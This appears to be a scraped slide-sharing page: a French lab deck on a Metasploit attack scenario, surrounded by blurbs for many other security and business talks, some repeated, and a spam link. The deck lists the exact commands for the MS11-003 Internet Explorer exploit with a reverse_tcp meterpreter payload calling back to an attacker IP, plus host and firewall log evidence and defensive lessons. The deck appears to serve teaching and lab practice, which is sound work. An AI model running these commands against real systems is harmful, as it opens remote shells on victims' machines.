nous allons étudier at analyser le phénomène de cheval de Troie, en particulier : ce qui concerne la lutte, et les moyens disponibles pour ce but, et puisque la propagation de ce troyen dans ces derniers temps est prodigieux nous devons tenir ces évolutions en compte.
Nous essayons aussi dans cet article à sensibiliser l'utilisateur aux menaces du cheval de troie et aux des marches des prudences qu’il doit le suivre.
ce qui est rootkit? comment il entrer.
Apprendre Facilement ainsi sur rootkit et supprimer un commentaire? apprendre encore plus:-http://www.virusspywaredesinstallation.com
nous allons étudier at analyser le phénomène de cheval de Troie, en particulier : ce qui concerne la lutte, et les moyens disponibles pour ce but, et puisque la propagation de ce troyen dans ces derniers temps est prodigieux nous devons tenir ces évolutions en compte.
Nous essayons aussi dans cet article à sensibiliser l'utilisateur aux menaces du cheval de troie et aux des marches des prudences qu’il doit le suivre.
ce qui est rootkit? comment il entrer.
Apprendre Facilement ainsi sur rootkit et supprimer un commentaire? apprendre encore plus:-http://www.virusspywaredesinstallation.com
- La sécurité informatique est de nos jours devenue un problème majeur dans la gestion des réseaux d’entreprise ainsi que pour les particuliers. Toujours plus nombreux à se connecter à Internet. La transmission d’information sensible et le désire d’assurer la confidentialité de celles-ci est devenue un point primordial dans la mise en place des réseaux informatiques. Ce document a pour but de présenter globalement la manière dont les « Hackers » opèrent afin de pénétrer les systèmes informatiques en espérant qu’il aide à pallier à ce type de problème de plus en plus fréquent …
This scenario outlines a network topology with a target Windows XP system, firewall gateway, and attacker system. The attacker sends a tweet with a malicious URL to the target, exploiting the MS11-03 IE vulnerability. This allows a reverse_tcp meterpreter payload to be launched on port 4444. Logs on the firewall show the connection, and evidence of the meterpreter session is found on the target including system information queries. Lessons learned include updating systems, using least privilege, being wary of links, and limiting outbound firewall rules.
Metasploit is an open source penetration testing framework that contains tools for scanning systems to identify vulnerabilities, exploits to take advantage of vulnerabilities, and payloads to control systems after exploitation. It provides a simple interface for security professionals to simulate attacks while testing systems and identifying weaknesses. The document discusses Metasploit's history and versions, how it can be used to conduct penetration testing, and key concepts like vulnerabilities, exploits, and payloads.
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahnullowaspmumbai
Malware Command and Control: Evasion Tactics and Techniques
Malware is designed to perform malicious actions without catching attention of the user. Malware Authors keep on developing new ideas to stay undetected by security technologies. In order to remain undetected, communication channels between attacker and malware needs to be stealthy and evolving. Making Command and control with attacker to receive on demand commands is an essential phase of the Cyber Kill Chain.
As a result, we are observing continuous advancement into communication channel for Malware Command and control.
In this session, we will try to cover some of the advanced techniques used by Malwares nowadays to communicate with it's command and control.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkStorage Switzerland
Ransomware is the number one threat to an organization's data. These malware programs infiltrate an organization and encrypt every file they can access. The only way to unencrypt the data is pay a fee to the malware creator. Hence the title ransomware. Studies indicate that malware infected as many as 70 percent of businesses just this year!
The problem is most of the recommended ransomware protection strategies are not able to protect an organization from this type of attack. In this on demand webinar listen as experts from Storage Switzerland and Nexsan discuss the five reasons you are not as protected from a ransomware attack as you think you are. More importantly learn how to create rock solid protection from any kind of ransomware attack.
This document summarizes a presentation on bridging the gap between penetration testing and red teaming using offensive PowerShell techniques. It introduces Empire, a pure PowerShell post-exploitation agent, and discusses how weak standard images, dirty networks, and domain trusts can be exploited to escalate privileges and move laterally. Various PowerShell modules for tasks like credential dumping, code execution, and lateral movement are demonstrated.
Using Massively Distributed Malware in APT-Style AttacksIBM Security
APTs are often associated with highly-customized malware, specifically tailored for the target of the attack. But in 2014, several APT-Style attacks involved the use of massively distributed malware to gain access to enterprise systems and corporate data.
The use of massively distributed malware provides significant advantages to the attackers who no longer need to spear phish targets or design custom malware. Instead, they use mass-distribution techniques to infect as many PCs as possible. According to IBM Trusteer research, 1:500 PCs in the world is already infected with Citadel, Zeus, or similar malware. Once a machine is infected with the malware, a new instruction set can be provided to turn the malware against different targets, or work with different command and controls (C&C) servers.
In this webinar, Dana Tamir, Director of Enterprise Security Product Marketing, examines the use of massively distributed malware in recent APT-Style attacks and discusses the impact of this emerging trend on enterprise IT security paradigms.
You will learn:
• Which types of malware used in these attacks
• How evasion techniques are used to bypass detection solutions
• What kind of information is most targeted
• How Trusteer Apex addresses these threats with a new approach to endpoint security
View the on-demand recording: https://attendee.gotowebinar.com/recording/4288360696484026881
Base64 encoding is a method of encoding binary data into a format that can be safely transported via email by representing the binary as text. It works by taking bits of data in groups of 6 bits and mapping them to a character in an ASCII character set, increasing the size of the encoded data by about 33%. While often confused as encryption, base64 is actually an encoding scheme used commonly to embed binary data like images or attachments into structured text formats like XML and SMTP email.
The document provides an overview of key features and capabilities of Burp Suite, a popular web application security testing tool. It discusses how to configure Burp Suite for optimal performance, techniques for proxying and filtering traffic, exploiting vulnerabilities using the intruder tool, passive and active scanning with the scanner, replaying requests with the repeater, crawling sites with the spider, analyzing tokens with the sequencer, decoding responses with the decoder, comparing responses with the comparer, searching with engagement tools, extending functionality with extender, maintaining the state of assessments, and references for additional learning. The document is intended to help users get started with Burp Suite and leverage its full capabilities as a "pro."
- La sécurité informatique est de nos jours devenue un problème majeur dans la gestion des réseaux d’entreprise ainsi que pour les particuliers. Toujours plus nombreux à se connecter à Internet. La transmission d’information sensible et le désire d’assurer la confidentialité de celles-ci est devenue un point primordial dans la mise en place des réseaux informatiques. Ce document a pour but de présenter globalement la manière dont les « Hackers » opèrent afin de pénétrer les systèmes informatiques en espérant qu’il aide à pallier à ce type de problème de plus en plus fréquent …
This scenario outlines a network topology with a target Windows XP system, firewall gateway, and attacker system. The attacker sends a tweet with a malicious URL to the target, exploiting the MS11-03 IE vulnerability. This allows a reverse_tcp meterpreter payload to be launched on port 4444. Logs on the firewall show the connection, and evidence of the meterpreter session is found on the target including system information queries. Lessons learned include updating systems, using least privilege, being wary of links, and limiting outbound firewall rules.
Metasploit is an open source penetration testing framework that contains tools for scanning systems to identify vulnerabilities, exploits to take advantage of vulnerabilities, and payloads to control systems after exploitation. It provides a simple interface for security professionals to simulate attacks while testing systems and identifying weaknesses. The document discusses Metasploit's history and versions, how it can be used to conduct penetration testing, and key concepts like vulnerabilities, exploits, and payloads.
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahnullowaspmumbai
Malware Command and Control: Evasion Tactics and Techniques
Malware is designed to perform malicious actions without catching attention of the user. Malware Authors keep on developing new ideas to stay undetected by security technologies. In order to remain undetected, communication channels between attacker and malware needs to be stealthy and evolving. Making Command and control with attacker to receive on demand commands is an essential phase of the Cyber Kill Chain.
As a result, we are observing continuous advancement into communication channel for Malware Command and control.
In this session, we will try to cover some of the advanced techniques used by Malwares nowadays to communicate with it's command and control.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkStorage Switzerland
Ransomware is the number one threat to an organization's data. These malware programs infiltrate an organization and encrypt every file they can access. The only way to unencrypt the data is pay a fee to the malware creator. Hence the title ransomware. Studies indicate that malware infected as many as 70 percent of businesses just this year!
The problem is most of the recommended ransomware protection strategies are not able to protect an organization from this type of attack. In this on demand webinar listen as experts from Storage Switzerland and Nexsan discuss the five reasons you are not as protected from a ransomware attack as you think you are. More importantly learn how to create rock solid protection from any kind of ransomware attack.
This document summarizes a presentation on bridging the gap between penetration testing and red teaming using offensive PowerShell techniques. It introduces Empire, a pure PowerShell post-exploitation agent, and discusses how weak standard images, dirty networks, and domain trusts can be exploited to escalate privileges and move laterally. Various PowerShell modules for tasks like credential dumping, code execution, and lateral movement are demonstrated.
Using Massively Distributed Malware in APT-Style AttacksIBM Security
APTs are often associated with highly-customized malware, specifically tailored for the target of the attack. But in 2014, several APT-Style attacks involved the use of massively distributed malware to gain access to enterprise systems and corporate data.
The use of massively distributed malware provides significant advantages to the attackers who no longer need to spear phish targets or design custom malware. Instead, they use mass-distribution techniques to infect as many PCs as possible. According to IBM Trusteer research, 1:500 PCs in the world is already infected with Citadel, Zeus, or similar malware. Once a machine is infected with the malware, a new instruction set can be provided to turn the malware against different targets, or work with different command and controls (C&C) servers.
In this webinar, Dana Tamir, Director of Enterprise Security Product Marketing, examines the use of massively distributed malware in recent APT-Style attacks and discusses the impact of this emerging trend on enterprise IT security paradigms.
You will learn:
• Which types of malware used in these attacks
• How evasion techniques are used to bypass detection solutions
• What kind of information is most targeted
• How Trusteer Apex addresses these threats with a new approach to endpoint security
View the on-demand recording: https://attendee.gotowebinar.com/recording/4288360696484026881
Base64 encoding is a method of encoding binary data into a format that can be safely transported via email by representing the binary as text. It works by taking bits of data in groups of 6 bits and mapping them to a character in an ASCII character set, increasing the size of the encoded data by about 33%. While often confused as encryption, base64 is actually an encoding scheme used commonly to embed binary data like images or attachments into structured text formats like XML and SMTP email.
The document provides an overview of key features and capabilities of Burp Suite, a popular web application security testing tool. It discusses how to configure Burp Suite for optimal performance, techniques for proxying and filtering traffic, exploiting vulnerabilities using the intruder tool, passive and active scanning with the scanner, replaying requests with the repeater, crawling sites with the spider, analyzing tokens with the sequencer, decoding responses with the decoder, comparing responses with the comparer, searching with engagement tools, extending functionality with extender, maintaining the state of assessments, and references for additional learning. The document is intended to help users get started with Burp Suite and leverage its full capabilities as a "pro."
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE20112461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE20112461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications. If you’re a breaker, you will learn a new technique and enjoy our exploits. If you’re a builder, you will learn how to mitigate this attack. In both cases, you can help us to eradicate CVE20112461. After all, Troopers is about making the world a safer place.
Mauro Gentile, Luca Carettoni
This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack paylists, and test authentication through bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.
Burp Suite is a free and professional Java-based tool for testing web application security. It includes several integrated tools like Proxy, Spider, Scanner, Intruder, Repeater, and Sequencer. The Proxy is used to intercept, modify, and replay HTTP/S requests. The Spider crawls the web application to discover hidden resources. The Scanner automatically scans for vulnerabilities. Intruder allows for customized attacks through fuzzing. Repeater replays requests for manual testing. And Sequencer analyzes randomness of tokens. It has both free and commercial editions, and supports Windows, Mac, and Linux.
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad SarangNinad Sarang
Blockchain is a distributed public ledger that records all Bitcoin transactions in a permanent, verifiable way. It uses cryptography to ensure the integrity and security of each transaction. New transactions are grouped into blocks and added to the blockchain through a process called mining, where miners compete to solve complex math problems. In return for securing the network, miners are rewarded with new Bitcoins. This decentralized system allows for peer-to-peer transactions without an intermediary.
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarangnullowaspmumbai
Agenda
We will cover lesser known web application attacks with there basics, how to do and mitigations.
Cross site scripting –
* Mutation XSS
* RPO XSS
* Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
Company X has contacted you to perform forensics work on a recent incident that occurred. One of their employees had received an email from a fellow co-worker that pointed to a PDF file. Upon opening, the employee did not seem to notice anything, however recently they have had unusual activity in their bank account. Company X was able to obtain a memory image of the employee’s virtual machine upon suspected infection. Company X wishes you to analyze the virtual memory and report on any suspected activities found. Questions can be found below to help in the formal report for the investigation.
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
De nos jours l’internet est devenue une source d’informations (business, réseaux sociaux…), avec des systèmes d’informations qui sont de plus en plus ouverts sur Internet. Ceux-ci présentent quelques failles de sécurité dont la mise en place des mesures sécuritaires devient une condition nécessaire, mais pas suffisante pour se protéger des risques présents sur la toile internet.
Comment interconnecter des réseaux ?
Comment permettre à des réseaux d’échanger des informations et limiter les risques liés à ces échanges ?
Nous avons mis en place un laboratoire de sécurité qui permet de faire des tests et détections d’intrusions. Le travail sait fait en deux parties.
D’abord la mise en place du laboratoire ensuite l’interconnexion avec des sites distants.
Gestion des vulnérabilités dans l'Internet des Objets : comment atteindre la cyber-résilience ?
Objectif : Être résilient « by design » face à de nouvelles vulnérabilités, en intégrant la gestion des vulnérabilités dans la maintenance du constructeur.
OCTO TALKS : 4 Tech Trends du Software Engineering.pdfOCTO Technology
En cette année 2024 qui s’annonce sous le signe de la complexité, avec :
- L’explosion de la Gen AI
-Un contexte socio-économique sous tensions
- De forts enjeux sur le Sustainable et la régulation IT
- Une archipélisation des lieux de travail post-Covid
Découvrez les Tech trends incontournables pour délivrer vos produits stratégiques.
L'IA connaît une croissance rapide et son intégration dans le domaine éducatif soulève de nombreuses questions. Aujourd'hui, nous explorerons comment les étudiants utilisent l'IA, les perceptions des enseignants à ce sujet, et les mesures possibles pour encadrer ces usages.
Constat Actuel
L'IA est de plus en plus présente dans notre quotidien, y compris dans l'éducation. Certaines universités, comme Science Po en janvier 2023, ont interdit l'utilisation de l'IA, tandis que d'autres, comme l'Université de Prague, la considèrent comme du plagiat. Cette diversité de positions souligne la nécessité urgente d'une réponse institutionnelle pour encadrer ces usages et prévenir les risques de triche et de plagiat.
Enquête Nationale
Pour mieux comprendre ces dynamiques, une enquête nationale intitulée "L'IA dans l'enseignement" a été réalisée. Les auteurs de cette enquête sont Le Sphynx (sondage) et Compilatio (fraude académique). Elle a été diffusée dans les universités de Lyon et d'Aix-Marseille entre le 21 juin et le 15 août 2023, touchant 1242 enseignants et 4443 étudiants. Les questionnaires, conçus pour étudier les usages de l'IA et les représentations de ces usages, abordaient des thèmes comme les craintes, les opportunités et l'acceptabilité.
Résultats de l'Enquête
Les résultats montrent que 55 % des étudiants utilisent l'IA de manière occasionnelle ou fréquente, contre 34 % des enseignants. Cependant, 88 % des enseignants pensent que leurs étudiants utilisent l'IA, ce qui pourrait indiquer une surestimation des usages. Les usages identifiés incluent la recherche d'informations et la rédaction de textes, bien que ces réponses ne puissent pas être cumulées dans les choix proposés.
Analyse Critique
Une analyse plus approfondie révèle que les enseignants peinent à percevoir les bénéfices de l'IA pour l'apprentissage, contrairement aux étudiants. La question de savoir si l'IA améliore les notes sans développer les compétences reste débattue. Est-ce un dopage académique ou une opportunité pour un apprentissage plus efficace ?
Acceptabilité et Éthique
L'enquête révèle que beaucoup d'étudiants jugent acceptable d'utiliser l'IA pour rédiger leurs devoirs, et même un quart des enseignants partagent cet avis. Cela pose des questions éthiques cruciales : copier-coller est-il tricher ? Utiliser l'IA sous supervision ou pour des traductions est-il acceptable ? La réponse n'est pas simple et nécessite un débat ouvert.
Propositions et Solutions
Pour encadrer ces usages, plusieurs solutions sont proposées. Plutôt que d'interdire l'IA, il est suggéré de fixer des règles pour une utilisation responsable. Des innovations pédagogiques peuvent également être explorées, comme la création de situations de concurrence professionnelle ou l'utilisation de détecteurs d'IA.
Conclusion
En conclusion, bien que l'étude présente des limites, elle souligne un besoin urgent de régulation. Une charte institutionnelle pourrait fournir un cadre pour une utilisation éthique.
Ouvrez la porte ou prenez un mur (Agile Tour Genève 2024)Laurent Speyser
(Conférence dessinée)
Vous êtes certainement à l’origine, ou impliqué, dans un changement au sein de votre organisation. Et peut être que cela ne se passe pas aussi bien qu’attendu…
Depuis plusieurs années, je fais régulièrement le constat de l’échec de l’adoption de l’Agilité, et plus globalement de grands changements, dans les organisations. Je vais tenter de vous expliquer pourquoi ils suscitent peu d'adhésion, peu d’engagement, et ils ne tiennent pas dans le temps.
Heureusement, il existe un autre chemin. Pour l'emprunter il s'agira de cultiver l'invitation, l'intelligence collective , la mécanique des jeux, les rites de passages, .... afin que l'agilité prenne racine.
Vous repartirez de cette conférence en ayant pris du recul sur le changement tel qu‘il est généralement opéré aujourd’hui, et en ayant découvert (ou redécouvert) le seul guide valable à suivre, à mon sens, pour un changement authentique, durable, et respectueux des individus! Et en bonus, 2 ou 3 trucs pratiques!
Le Comptoir OCTO - Qu’apporte l’analyse de cycle de vie lors d’un audit d’éco...OCTO Technology
Par Nicolas Bordier (Consultant numérique responsable @OCTO Technology) et Alaric Rougnon-Glasson (Sustainable Tech Consultant @OCTO Technology)
Sur un exemple très concret d’audit d’éco-conception de l’outil de bilan carbone C’Bilan développé par ICDC (Caisse des dépôts et consignations) nous allons expliquer en quoi l’ACV (analyse de cycle de vie) a été déterminante pour identifier les pistes d’actions pour réduire jusqu'à 82% de l’empreinte environnementale du service.
Vidéo Youtube : https://www.youtube.com/watch?v=7R8oL2P_DkU
Compte-rendu :
Le Comptoir OCTO - Équipes infra et prod, ne ratez pas l'embarquement pour l'...OCTO Technology
par Claude Camus (Coach agile d'organisation @OCTO Technology) et Gilles Masy (Organizational Coach @OCTO Technology)
Les équipes infrastructure, sécurité, production, ou cloud, doivent consacrer du temps à la modernisation de leurs outils (automatisation, cloud, etc) et de leurs pratiques (DevOps, SRE, etc). Dans le même temps, elles doivent répondre à une avalanche croissante de demandes, tout en maintenant un niveau de qualité de service optimal.
Habitué des environnements développeurs, les transformations agiles négligent les particularités des équipes OPS. Lors de ce comptoir, nous vous partagerons notre proposition de valeur de l'agilité@OPS, qui embarquera vos équipes OPS en Classe Business (Agility), et leur fera dire : "nous ne reviendrons pas en arrière".
2. Scénario 1: Topologie
Target Firewall Attacker
Gateway
192.168.111.0/24 192.168.178.0/24
Target :
- Windows XP SP3 - L’utilisateur utilise un compte admin
- IP : 192.168.111.129 - Gateway par défaut : 192.168.111.128
- Pas d’anti-virus / Firewall Windows Windows activé
- Vulnérable à MS11-003
Firewall Gateway :
- Eth0 : 192.168.111.128 (interface interne)
- Eth1 : 192.168.178.59 (interface externe)
Attacker :
- IP : 192.168.178.21
3. Scénario 1: Règles Firewall
• L’administration du Firewall s’effectue par SSH par le biais du réseau local.
• Le réseau interne peut effectuer des requêtes «Any» vers le réseau externe
4. Scénario 1: Story-Board
✤ Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi
à la configuration réseau classique des petites et moyennes entreprises.
✤ L’attaquant envoi un message Twitter à la victime. Le message contient une URL
malveillante (qui peut être réduite) qui exploitera la vulnérabilité Internet Explorer
MS11-003.
✤ La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée.
✤ Après l’exploitation de la vulnérabilité un «payload» meterpreter reverse_tcp est initié
sur le port 4444/TCP de l’attaquant.
✤ Aucune post exploitations ne sera abordée dans ce scénario.
5. Scénario 1: Commandes
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
route
getuid
6. Scénario 1: Evidences
Un processus Internet Explorer est créé :
A new process has been created:
New Process ID:
3200
Image File Name:
C:Program FilesInternet Exploreriexplore.exe
Creator Process ID:
2224
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Le processus Internet Explorer créé un nouveau processus «notepad.exe» :
A new process has been created:
New Process ID:
3972
Image File Name:
C:WINDOWSsystem32notepad.exe
Creator Process ID:
3200
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Les logs sur le Firewall :
Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00
PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
7. Scénario 1: Leçons apprises
•Mettre à jour son OS et ses applications !
•Ne pas exécuter les applications avec des privilèges administrateur !
•Ne jamais cliquer sur des liens inconnus, surtout raccourcis, provenant de sources !
•Installer un anti-virus et ne pas avoir confiance dans celui-ci :)
•Ne pas faire confiance à vos Firewall (locaux ou distant) !
•Ne pas autoriser des connexions sortantes du type «Any» depuis votre réseau interne
vers des réseaux qui ne sont pas de confiance ! Limiter les connexions sortantes à vos
véritables besoins.
7